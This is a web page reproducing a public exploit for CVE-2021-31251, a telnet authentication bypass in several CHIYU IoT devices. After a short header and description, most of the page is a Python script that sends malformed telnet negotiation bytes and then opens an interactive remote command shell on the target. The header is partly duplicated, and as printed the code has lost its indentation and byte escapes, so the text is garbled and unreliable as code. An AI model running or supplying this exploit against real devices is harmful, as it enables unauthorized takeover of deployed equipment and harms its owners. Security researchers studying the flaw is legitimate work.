Vulnerabilities

CHIYU IoT Telnet Authentication Bypass

# Exploit Title: CHIYU IoT Devices - 'Telnet' Authentication Bypass
# Date: 01/06/2021
# Exploit Author: sirpedrotavares
# Vendor Homepage: https://www.chiyu-tech.com/msg/msg88. # Exploit Title: CHIYU IoT Devices - 'Telnet' Authentication Bypass
# Date: 01/06/2021
# Exploit Author: sirpedrotavares
# Vendor Homepage: https://www.chiyu-tech.com/msg/msg88.html
# Software Link: https://www.chiyu-tech.com/category-hardware.html
# Version: BF-430, BF-431, BF-450M, and SEMAC - all firmware versions < June 2021
# Tested on: BF-430, BF-431, BF-450M, and SEMAC
# CVE: CVE-2021-31251
# Publication: https://seguranca-informatica.pt/dancing-in-the-iot-chiyu-devices-vulnerable-to-remote-attacks

"""
Description: Several IoT devices from the CHIYU Technology firm are
vulnerable to a flaw that permits bypassing the telnet authentication
process due to an overflow during the negotiation of the telnet protocol.
Telnet authentication is bypassed by supplying a specially malformed
request, and an attacker may force the remote telnet server to believe that
the user has already authenticated. Several models are vulnerable,
including BF-430, BF-431, BF-450M, and SEMAC with the most recent firmware
versions.
CVE ID: CVE-2021-31251
CVSS: Critical - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
URL: https://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chiyu-iot-devices#cve-2021-31251
"""

#!/usr/bin/env python3

# usage: python3 exploit.py IP

import socket
import time
import sys

HOST = sys.argv[1]
PORT = 23

socket.setdefaulttimeout(10)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

try:
connect = s.connect_ex((HOST, PORT))
try:
print("[+] Try to connect... ")
time.sleep(1)
s.send(b"xffxfbx01xffxfbx03xffxfdx18")
s.recv(1024).strip()
s.send(b"xffxfbx01xffxfbx03xffxfdx18")
s.recv(1024).strip()
s.send(b"xffxfbx01xffxfbx03xffxfdx18")
result = s.recv(1024).strip()
if result != b'xffxfex01':
s.send(b"x09")
result = s.recv(1024).strip()

if connect == 0 and "sername" not in str(result):
if b"xffxfex01" == result:
print("Connected! ;) type: "help" ")
while 1:
cmd = input("(CHIYU pwnShell:) $ ")
body = cmd+" "
s.send(body.encode('utf-8', 'ignore'))
result = s.recv(1024).decode('utf8', 'ignore')

if not len(result):
print("[+] CHIYU device not available, try
again ... (terminating)")
s.close()
break
print(result.strip('CMD>'))
b = " "
s.send(b.encode('utf-8', 'ignore'))
result = s.recv(1024).decode()
print(result.strip('CMD>'))
except KeyboardInterrupt:
print(" [+] ^C Received, closing connection")
s.close()
except EOFError:
print(" [+] ^D Received, closing connection")
s.close()

except socket.error:
print("[+] Unable to connect to CHIYU device.")

Share your comment publicly